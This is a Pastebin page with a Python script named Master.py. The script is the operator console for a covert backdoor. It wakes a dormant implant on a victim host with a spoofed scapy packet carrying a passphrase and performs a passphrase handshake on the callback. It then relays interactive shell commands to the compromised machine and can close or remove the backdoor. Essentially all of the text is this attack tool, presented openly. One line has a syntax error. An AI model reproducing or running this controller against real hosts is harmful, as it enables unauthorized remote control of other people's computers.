API tools faq
paste
Advertisement
WhichHat

Master.py

WhichHat
Mar 24th, 2017
549
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.63 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python3
  2. import sys
  3. import socket
  4. import logging
  5. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  6. from scapy.all import *
  7.  
  8.  
  9. prompt = ""
  10. username = ""
  11. sep = ""
  12.  
  13. gLHost = "" # local IP
  14. gRHost = "" # victim IP
  15. gLPort = -1 # local port number
  16. gRPort = -1 # requested victim port number
  17.  
  18.  
  19. gLHost = input("[?] Local Host IP : ")
  20. gLPort = int(input("[?] Local Port Number : "))
  21. gRHost = input("[?] Backdoor Host IP : ")
  22. gRPort = int(input("[?] Request Backdoor Port : "))
  23.  
  24.  
  25. def Request(lHost, lPort, rHost, rPort):
  26.     global prompt
  27.     global username
  28.     global sep
  29.     nbattempts = 3 # Let give it 3 attempts. If all fail just give up
  30.     while nbattempts > 0:
  31.         skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  32.         skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Reuse a socket even if it has been recently closed and is timing.
  33.         skt.settimeout(3) # Wait up to 3 sec on blocking method
  34.         skt.bind((lHost, lPort)) # open the socket
  35.         skt.listen(1) # only 1 connection accepted at the same time
  36.         # Emit a scapy TCP packet containing the appropriate passphrase in order to wake up the backdoor
  37.         send(IP(src=lHost, dst=rHost)/TCP(sport=lPort, dport=rPort, flags="A")/Raw(load="passphrase1"), verbose=0)
  38.         try:
  39.             conn, sender = skt.accept() # accept a incoming connection
  40.             addr = sender[0]
  41.             port = sender[1]
  42.             if addr == rHost or port == rPort: # check if the source is what we expect : The dest of a scapy packet
  43.                 break
  44.             else : # sth connected but it's not our backdoor
  45.                 skt.close()
  46.                 nbattempts -= 1
  47.                 print("[!] Warning : Received unauthorized connection request... Connection refused")
  48.         except socket.timeout: # accept() timed out
  49.             skt.close()
  50.             nbattempts -= 1
  51.             print("[-] Failure : No answer... retrying")
  52.    
  53.     try:
  54.         if nbattempts == 0: # 0 attempt left so failed to establish the connection with the backdoor
  55.             # maybe because there is no backdoor on the given host
  56.             # or the backdoor couldn't open the requested remote port
  57.             # or a proxy firewall the wakeup packets
  58.             # or too many unwanted connection on the given local port... that would be quite worring...
  59.             raise socket.timeout()
  60.         conn.sendall(b"passphrase2")
  61.         passphrase = conn.recv(1024)
  62.         while True:
  63.             if type(passphrase) == bytes:
  64.                 passphrase = passphrase.decode("utf-8")
  65.             if passphrase == "passphrase3":
  66.                 conn.sendall(b"Report")
  67.                 user=conn.recv(1024)
  68.                 if type(user) == bytes:
  69.                     user = user.decode("utf-8")
  70.                 conn.sendall(b"Location")
  71.                 location = conn.recv(1024)
  72.                 if type(location) == bytes:
  73.                     location = location.decode("utf-8")
  74.                 username = user[:len(user)-1]
  75.                 sep = user[len(user)-1]
  76.                 prompt = username+location+prompt
  77.                 print("[+] Success : connected")
  78.                 return skt, conn
  79.             else
  80.                 skt.close()
  81.                 conn.close()
  82.                 return None, None
  83.     except socket.timeout:
  84.         skt.close()
  85.         print("[-] Failure : No answer from the backdoor")
  86.         return None, None
  87.     except (KeyboardInterrupt, SystemExit):
  88.         skt.close()
  89.         print("[-] Failure : User keyboard interruption")
  90.         return None, None
  91.  
  92.  
  93. def SendCommand(conn, command):
  94.     conn.sendall(str.encode(command))
  95.     res = conn.recv(65535)
  96.     if type(res) == bytes:
  97.         res = res.decode("utf-8")
  98.     return res
  99.    
  100. def ConnectBackdoor(lHost, lPort, rHost, rPort):
  101.     global prompt, username, sep
  102.     skt, conn = Request(lHost, lPort, rHost, rPort)
  103.     if skt != None and conn != None:
  104.         try:
  105.             while True:
  106.                 command = input(prompt+" ")
  107.                 if command != "":
  108.                     output = SendCommand(conn, command)
  109.                     if command.split()[0] == "cd":
  110.                         if len(output.split()) == 1:
  111.                             prompt = username+output+sep
  112.                         else:
  113.                             print(output)
  114.                     elif output.lower() == "exited":
  115.                         print("Success : Backdoor closed")
  116.                         break
  117.                     elif output.lower() == "released":
  118.                         print("Success : Backdoor removed")
  119.                         break
  120.                     else:
  121.                         if output.lower() != "daemonnoreport": # message sent by the backdoor when the command return no result to avoid troublesome packet padding
  122.                             print(output)
  123.                 else:
  124.                     continue
  125.         except (KeyboardInterrupt, SystemExit):
  126.             output = SendCommand(conn, "exit") # Send automatic exit command on error to prevent the backdoor being locked
  127.             if output.lower() == "exited":
  128.                 print("Success : Done")
  129.         except Exception as err:
  130.             print(err.args)
  131.             print("[-] Error : Something went wrong :'(") # Send automatic exit command on error to prevent the backdoor being locked
  132.             output = SendCommand(conn, "exit")
  133.             if output.lower() == "exited":
  134.                 print("Success : Backdoor closed")
  135.         finally:
  136.             conn.close()
  137.             skt.close()
  138.            
  139.  
  140. ConnectBackdoor(gLHost, gLPort, gRHost, gRPort)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!